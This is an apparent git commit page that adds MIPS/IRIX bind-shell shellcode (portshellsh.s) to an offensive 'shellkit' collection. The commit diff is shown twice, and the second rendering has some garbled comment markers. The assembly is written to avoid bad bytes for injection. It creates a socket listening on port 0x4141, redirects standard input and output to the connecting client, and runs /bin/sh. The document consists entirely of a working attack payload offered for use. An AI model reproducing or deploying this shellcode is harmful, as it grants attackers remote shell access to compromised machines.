initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix/portshellsh.s
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
1 files changed, 126 insertions, 0 deletions
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s
new file mode 100644
index 0000000..18070f6
--- /dev/null
+++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
+/* MIPS/IRIX PIC listening port shellcode
+ * no 0x00, 0x0a, 0x0d, 0x25 bytes
+ *
+ * bind a shell to tcp port 0x4141
+ *
+ * 2001/05/25 optimized from 368 down to 188 bytes -sc.
+ *
+ */
+        /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+#include <elf.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
+         */
+        li      s6, 0x7350
+        subu    a0, s6, 0x734e  /* AF_INET = 2 */
+        subu    a1, s6, 0x734e  /* SOCK_STREAM = 2 */
+        subu    a2, s6, 0x734a  /* IPPROTO_TCP = 6 */
+        li      v0, SYS_socket  /* 0x0453 */
+        syscall
+        /* socket returned in v0, save to a0
+         */
+        andi    a0, v0, 0xffff          /* a0 = socket */
+        /* build struct sockaddr_in
+         * 0x0002port 0x00000000 0x00000000 0x00000000
+         */
+        subu    t2, s6, 0x734e          /* t2 = 0x0002 */
+        sh      t2, -16(sp)
+        li      t2, 0x4141              /* t2 = port number */
+        sh      t2, -14(sp)
+        sw      zero, -12(sp)
+        sw      zero, -8(sp)
+        sw      zero, -4(sp)
+        /* bind (socket, (struct sockaddr *) srv_addr,
+         *      sizeof (struct sockaddr_in)
+         */
+        subu    a2, s6, 0x7340  /* a2 = sizeof (struct sockaddr_in) = 0x10 */
+        subu    a1, sp, a2      /* a1 = (struct sockaddr *) */
+        li      v0, SYS_bind    /* 0x0442 */
+        syscall
+        /* listen (socket, backlog)
+         * XXX: is it safe here to make backlog = pointer-on-the-stack ?
+         *      should be, since its still a positive number
+         */
+/*      subu    a1, s6, 0x7340  *//* a1 = backlog = 0x10 */
+        li      v0, SYS_listen  /* 0x0448 */
+        syscall
+        /* accept (socket, (struct sockaddr *) cl_addr,
+         *      &socklen)
+         * XXX: a1 is still the pointer to the sockaddr struct
+         * a2 should be 0x10 still
+         */
+        sw      a2, -20(sp)
+        subu    a2, sp, 20      /* a2 = &socklen */
+        li      v0, SYS_accept  /* 0x0441 */
+        syscall
+        /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
+         */
+        subu    s3, s6, 0x431e  /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
+        /* socket returned in v0, save in s7
+         */
+        andi    s7, v0, 0xffff
+        /* dup is emulated through close and fcntl, since irix offers no
+         * native dup syscall as for example linux. see phrack 56 for details
+         */
+dup_loop:
+        andi    a0, s3, 0x0103  /* a0 = STD*_FILENO */
+        li      v0, SYS_close   /* 0x03ee */
+        syscall
+        andi    a0, s7, 0xffff  /* a0 = socket */
+        slti    a1, zero, -1    /* a1 = 0 */
+        andi    a2, s3, 0x0103  /* a2 = STD*_FILENO */
+        li      v0, SYS_fcntl   /* 0x0426 */
+        syscall
+        subu    s3, 0x1011
+        bgez    s3, dup_loop
+        /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
+         */
+        sw      zero, -4(sp)
+        /* a2 (envp) is already zero due to the dup_loop
+         */
+gaddr:  bltzal  zero, gaddr     /* rock on-. lsd */
+        subu    a1, sp, 8
+        /* ra contains the proper address now */
+        addu    ra, ra, 0x0120  /* add 32 + 0x0100 */
+        add     a0, ra, -(8 + 0x100)
+        sb      zero, -(1 + 0x100)(ra)  /* store NUL */
+        sw      a0, -8(sp)
+        li      v0, SYS_execve
+        syscall
+        .end    cbegin
+cend:
+        /* XXX append here: "/bin/sh\x42" */
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix/portshellsh.s
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s new file mode 100644 index 0000000..18070f6 --- /dev/null +++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
	1	/* MIPS/IRIX PIC listening port shellcode
	2	* no 0x00, 0x0a, 0x0d, 0x25 bytes
	3	*
	4	* bind a shell to tcp port 0x4141
	5	*
	6	* 2001/05/25 optimized from 368 down to 188 bytes -sc.
	7	*
	8	*/
	9
	10	/* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
	11
	12	#include <sgidefs.h>
	13	#include <sys/regdef.h>
	14	#include <sys/asm.h>
	15	#include <sys.s>
	16	#include <sys/syscall.h>
	17	#include <elf.h>
	18
	19	.section .text
	20
	21	.globl cbegin
	22	.globl cend
	23
	24	cbegin:
	25	.set noreorder
	26	.set nomacro
	27
	28	/* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
	29	*/
	30	li s6, 0x7350
	31	subu a0, s6, 0x734e /* AF_INET = 2 */
	32	subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
	33	subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
	34	li v0, SYS_socket /* 0x0453 */
	35	syscall
	36
	37	/* socket returned in v0, save to a0
	38	*/
	39	andi a0, v0, 0xffff /* a0 = socket */
	40
	41	/* build struct sockaddr_in
	42	* 0x0002port 0x00000000 0x00000000 0x00000000
	43	*/
	44	subu t2, s6, 0x734e /* t2 = 0x0002 */
	45	sh t2, -16(sp)
	46	li t2, 0x4141 /* t2 = port number */
	47	sh t2, -14(sp)
	48	sw zero, -12(sp)
	49	sw zero, -8(sp)
	50	sw zero, -4(sp)
	51
	52	/* bind (socket, (struct sockaddr *) srv_addr,
	53	* sizeof (struct sockaddr_in)
	54	*/
	55	subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
	56	subu a1, sp, a2 /* a1 = (struct sockaddr ) /
	57	li v0, SYS_bind /* 0x0442 */
	58	syscall
	59
	60	/* listen (socket, backlog)
	61	* XXX: is it safe here to make backlog = pointer-on-the-stack ?
	62	* should be, since its still a positive number
	63	*/
	64	/* subu a1, s6, 0x7340 // a1 = backlog = 0x10 */
	65	li v0, SYS_listen /* 0x0448 */
	66	syscall
	67
	68	/* accept (socket, (struct sockaddr *) cl_addr,
	69	* &socklen)
	70	* XXX: a1 is still the pointer to the sockaddr struct
	71	* a2 should be 0x10 still
	72	*/
	73	sw a2, -20(sp)
	74	subu a2, sp, 20 /* a2 = &socklen */
	75	li v0, SYS_accept /* 0x0441 */
	76	syscall
	77
	78
	79	/* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
	80	*/
	81	subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
	82
	83	/* socket returned in v0, save in s7
	84	*/
	85	andi s7, v0, 0xffff
	86
	87	/* dup is emulated through close and fcntl, since irix offers no
	88	* native dup syscall as for example linux. see phrack 56 for details
	89	*/
	90	dup_loop:
	91	andi a0, s3, 0x0103 /* a0 = STD_FILENO /
	92	li v0, SYS_close /* 0x03ee */
	93	syscall
	94
	95	andi a0, s7, 0xffff /* a0 = socket */
	96	slti a1, zero, -1 /* a1 = 0 */
	97	andi a2, s3, 0x0103 /* a2 = STD_FILENO /
	98	li v0, SYS_fcntl /* 0x0426 */
	99	syscall
	100
	101	subu s3, 0x1011
	102	bgez s3, dup_loop
	103
	104	/* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
	105	*/
	106	sw zero, -4(sp)
	107
	108	/* a2 (envp) is already zero due to the dup_loop
	109	*/
	110	gaddr: bltzal zero, gaddr /* rock on-. lsd */
	111	subu a1, sp, 8
	112
	113	/* ra contains the proper address now */
	114	addu ra, ra, 0x0120 /* add 32 + 0x0100 */
	115
	116	add a0, ra, -(8 + 0x100)
	117	sb zero, -(1 + 0x100)(ra) /* store NUL */
	118	sw a0, -8(sp)
	119	li v0, SYS_execve
	120	syscall
	121
	122	.end cbegin
	123	cend:
	124
	125	/* XXX append here: "/bin/sh\x42" */
	126